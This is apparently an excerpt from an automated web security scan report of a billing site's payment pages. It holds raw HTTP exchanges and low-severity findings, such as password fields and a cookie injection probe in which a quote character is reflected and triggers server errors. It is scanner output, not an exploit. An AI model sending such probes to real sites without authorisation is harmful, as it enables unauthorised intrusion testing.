HTTP/1.1 500 Internal Server Error Date: Fri, 31 Dec 2010 15:06:45 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: sitekey=vivid; expires=Fri, 07-Jan-2011 15:06:45 GMT; path=/; domain=.vs.com Set-Cookie: service=girls; expires=Sat, 31-Dec-2011 15:06:45 GMT; path=/; domain=.vs.com Set-Cookie: mp_code=cqiu; expires=Sun, 30-Jan-2011 15:06:45 GMT; path=/; domain=.vs.com Set-Cookie: source_code=default; expires=Fri, 07-Jan-2011 15:06:45 GMT; path=/; domain=.vs.com Set-Cookie: product_type=live; expires=Fri, 07-Jan-2011 15:06:45 GMT; path=/; domain=.vs.com Set-Cookie: use_new_tpls=1c2a76%22 Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 0 |
Severity: | Information |
Confidence: | Certain |
Host: | https://billing.vs.com |
Path: | /payment/index.php |
GET /payment/index.php Host: billing.vs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: source_code=default; use_new_tpls=1c2a76%22 |
HTTP/1.1 500 Internal Server Error Date: Fri, 31 Dec 2010 15:11:20 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: sitekey=vivid; expires=Fri, 07-Jan-2011 15:11:20 GMT; path=/; domain=.vs.com Set-Cookie: service=girls; expires=Sat, 31-Dec-2011 15:11:20 GMT; path=/; domain=.vs.com Set-Cookie: mp_code=cqiu; expires=Sun, 30-Jan-2011 15:11:20 GMT; path=/; domain=.vs.com Set-Cookie: source_code=default; expires=Fri, 07-Jan-2011 15:11:20 GMT; path=/; domain=.vs.com Set-Cookie: product_type=live; expires=Fri, 07-Jan-2011 15:11:20 GMT; path=/; domain=.vs.com Set-Cookie: use_new_tpls=b8a4e58 Connection: close Content-Type: text/html Content-Length: 0 |
Severity: | Low |
Confidence: | Certain |
Host: | https://billing.vs.com |
Path: | /payment/ |
GET /payment/?mp_code=cqiu Host: billing.vs.com Connection: keep-alive Referer: http://vividlive.com/ Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Fri, 31 Dec 2010 15:05:19 GMT Server: Apache Set-Cookie: PHPSESSID=38aiuoljff Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: sitekey=vivid; expires=Fri, 07-Jan-2011 15:05:19 GMT; path=/; domain=.vs.com Set-Cookie: service=girls; expires=Sat, 31-Dec-2011 15:05:19 GMT; path=/; domain=.vs.com Set-Cookie: mp_code=cqiu; expires=Sun, 30-Jan-2011 15:05:19 GMT; path=/; domain=.vs.com Set-Cookie: source_code=default; expires=Fri, 07-Jan-2011 15:05:19 GMT; path=/; domain=.vs.com Set-Cookie: product_type=live; expires=Fri, 07-Jan-2011 15:05:19 GMT; path=/; domain=.vs.com Vary: Accept-Encoding Keep-Alive: timeout=15, max=1000 Connection: Keep-Alive Content-Type: text/html Content-Length: 29722 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... </div> <form id="payment_form" method="post" action="/payment/index <div class="content"> ...[SNIP]... <td class="right" style="background: none;"> <input type="password" id="password" name="ITEM[password]" size="15" maxlength="32" tabindex="2" value="" /> (4-32 characters) <div style="height: 22px;" id="password_strength" style="padding: 5px; width: 200px;"> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | https://billing.vs.com |
Path: | /payment/ |
GET /payment/?form_type=new Host: billing.vs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: source_code=default; mp_code=cqiu; service=girls; PHPSESSID=38aiuoljff |
HTTP/1.1 200 OK Date: Fri, 31 Dec 2010 15:05:47 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: sitekey=vivid; expires=Fri, 07-Jan-2011 15:05:47 GMT; path=/; domain=.vs.com Set-Cookie: service=girls; expires=Sat, 31-Dec-2011 15:05:47 GMT; path=/; domain=.vs.com Set-Cookie: mp_code=cqiu; expires=Sun, 30-Jan-2011 15:05:47 GMT; path=/; domain=.vs.com Set-Cookie: source_code=default; expires=Fri, 07-Jan-2011 15:05:47 GMT; path=/; domain=.vs.com Set-Cookie: product_type=live; expires=Fri, 07-Jan-2011 15:05:47 GMT; path=/; domain=.vs.com Set-Cookie: use_new_tpls=1; expires=Fri, 07-Jan-2011 15:05:47 GMT; path=/; domain=.vs.com Set-Cookie: pa_id=50587201; path=/payment/; domain=.billing.vs.com Connection: close Content-Type: text/html Content-Length: 10107 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... </div> <form id="payment_form" method="post" action="/payment/index <div class="content"> ...[SNIP]... <td class="right"> <input type="password" id="password" name="ITEM[password]" size="15" maxlength="32" tabindex="2" value=""> </td> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | https://billing.vs.com |
Path: | /payment/ |
GET /payment/?mp_code=cqiu Host: billing.vs.com Connection: keep-alive Referer: http://vividlive.com/ Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Fri, 31 Dec 2010 15:05:46 GMT Server: Apache Set-Cookie: PHPSESSID=qmcaomq4re Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: sitekey=vivid; expires=Fri, 07-Jan-2011 15:05:46 GMT; path=/; domain=.vs.com Set-Cookie: service=girls; expires=Sat, 31-Dec-2011 15:05:46 GMT; path=/; domain=.vs.com Set-Cookie: mp_code=cqiu; expires=Sun, 30-Jan-2011 15:05:46 GMT; path=/; domain=.vs.com Set-Cookie: source_code=default; expires=Fri, 07-Jan-2011 15:05:46 GMT; path=/; domain=.vs.com Set-Cookie: product_type=live; expires=Fri, 07-Jan-2011 15:05:46 GMT; path=/; domain=.vs.com Vary: Accept-Encoding Keep-Alive: timeout=15, max=1000 Connection: Keep-Alive Content-Type: text/html Content-Length: 29722 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... </div> <form id="payment_form" method="post" action="/payment/index <div class="content"> ...[SNIP]... <td class="right" style="background: none;"> <input type="password" id="password" name="ITEM[password]" size="15" maxlength="32" tabindex="2" value="" /> (4-32 characters) <div style="height: 22px;" id="password_strength" style="padding: 5px; width: 200px;"> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | https://billing.vs.com |
Path: | /payment/index.php |
GET /payment/index.php HTTP/1.1 Host: billing.vs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: source_code=default; mp_code=cqiu; service=girls; PHPSESSID=38aiuoljff |
HTTP/1.1 200 OK Date: Fri, 31 Dec 2010 15:05:48 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: sitekey=vivid; expires=Fri, 07-Jan-2011 15:05:48 GMT; path=/; domain=.vs.com Set-Cookie: service=girls; expires=Sat, 31-Dec-2011 15:05:48 GMT; path=/; domain=.vs.com Set-Cookie: mp_code=cqiu; expires=Sun, 30-Jan-2011 15:05:48 GMT; path=/; domain=.vs.com Set-Cookie: source_code=default; expires=Fri, 07-Jan-2011 15:05:48 GMT; path=/; domain=.vs.com Set-Cookie: product_type=live; expires=Fri, 07-Jan-2011 15:05:48 GMT; path=/; domain=.vs.com Set-Cookie: use_new_tpls=1; expires=Fri, 07-Jan-2011 15:05:48 GMT; path=/; domain=.vs.com Connection: close Content-Type: text/html Content-Length: 29842 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... </div> <form id="payment_form" method="post" action="/payment/index <div class="content"> ...[SNIP]... <td class="right" style="background: none;"> <input type="password" id="password" name="ITEM[password]" size="15" maxlength="32" tabindex="2" value="" /> (4-32 characters) <div style="height: 22px;" id="password_strength" style="padding: 5px; width: 200px;"> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://billing.vs.com |
Path: | /payment/ |
GET /payment/?mp_code=cqiu Host: billing.vs.com Connection: keep-alive Referer: http://vividlive.com/ Cache-Control: max-age=0 Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=38aiuoljff |
HTTP/1.1 500 Internal Server Error Date: Fri, 31 Dec 2010 15:06:45 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: sitekey=vivid; expires=Fri, 07-Jan-2011 15:06:45 GMT; path=/; domain=.vs.com Set-Cookie: service=girls; expires=Sat, 31-Dec-2011 15:06:45 GMT; path=/; domain=.vs.com Set-Cookie: mp_code=cqiu; expires=Sun, 30-Jan-2011 15:06:45 GMT; path=/; domain=.vs.com Set-Cookie: source_code=default; expires=Fri, 07-Jan-2011 15:06:45 GMT; path=/; domain=.vs.com Set-Cookie: product_type=live; expires=Fri, 07-Jan-2011 15:06:45 GMT; path=/; domain=.vs.com Set-Cookie: use_new_tpls=1c2a76%22 Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 0 |
Severity: | Information |
Confidence: | Certain |
Host: | https://billing.vs.com |
Path: | /payment/index.php |
GET /payment/index.php Host: billing.vs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: source_code=default; use_new_tpls=1c2a76%22 |
HTTP/1.1 500 Internal Server Error Date: Fri, 31 Dec 2010 15:11:20 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: sitekey=vivid; expires=Fri, 07-Jan-2011 15:11:20 GMT; path=/; domain=.vs.com Set-Cookie: service=girls; expires=Sat, 31-Dec-2011 15:11:20 GMT; path=/; domain=.vs.com Set-Cookie: mp_code=cqiu; expires=Sun, 30-Jan-2011 15:11:20 GMT; path=/; domain=.vs.com Set-Cookie: source_code=default; expires=Fri, 07-Jan-2011 15:11:20 GMT; path=/; domain=.vs.com Set-Cookie: product_type=live; expires=Fri, 07-Jan-2011 15:11:20 GMT; path=/; domain=.vs.com Set-Cookie: use_new_tpls=b8a4e58 Connection: close Content-Type: text/html Content-Length: 0 |
Severity: | Information |
Confidence: | Certain |
Host: | https://billing.vs.com |
Path: | /payment/ |
GET /payment/?mp_code=cqiu Host: billing.vs.com Connection: keep-alive Referer: http://vividlive.com/ Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Fri, 31 Dec 2010 15:05:19 GMT Server: Apache Set-Cookie: PHPSESSID=38aiuoljff Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: sitekey=vivid; expires=Fri, 07-Jan-2011 15:05:19 GMT; path=/; domain=.vs.com Set-Cookie: service=girls; expires=Sat, 31-Dec-2011 15:05:19 GMT; path=/; domain=.vs.com Set-Cookie: mp_code=cqiu; expires=Sun, 30-Jan-2011 15:05:19 GMT; path=/; domain=.vs.com Set-Cookie: source_code=default; expires=Fri, 07-Jan-2011 15:05:19 GMT; path=/; domain=.vs.com Set-Cookie: product_type=live; expires=Fri, 07-Jan-2011 15:05:19 GMT; path=/; domain=.vs.com Vary: Accept-Encoding Keep-Alive: timeout=15, max=1000 Connection: Keep-Alive Content-Type: text/html Content-Length: 29722 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <td> <a target="_blank" href="https://www ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://billing.vs.com |
Path: | /payment/index.php |
GET /payment/index.php Host: billing.vs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: source_code=default; mp_code=cqiu; service=girls; PHPSESSID=38aiuoljff |
HTTP/1.1 200 OK Date: Fri, 31 Dec 2010 15:05:48 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: sitekey=vivid; expires=Fri, 07-Jan-2011 15:05:48 GMT; path=/; domain=.vs.com Set-Cookie: service=girls; expires=Sat, 31-Dec-2011 15:05:48 GMT; path=/; domain=.vs.com Set-Cookie: mp_code=cqiu; expires=Sun, 30-Jan-2011 15:05:48 GMT; path=/; domain=.vs.com Set-Cookie: source_code=default; expires=Fri, 07-Jan-2011 15:05:48 GMT; path=/; domain=.vs.com Set-Cookie: product_type=live; expires=Fri, 07-Jan-2011 15:05:48 GMT; path=/; domain=.vs.com Set-Cookie: use_new_tpls=1; expires=Fri, 07-Jan-2011 15:05:48 GMT; path=/; domain=.vs.com Connection: close Content-Type: text/html Content-Length: 29836 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <td> <a target="_blank" href="https://www ...[SNIP]... |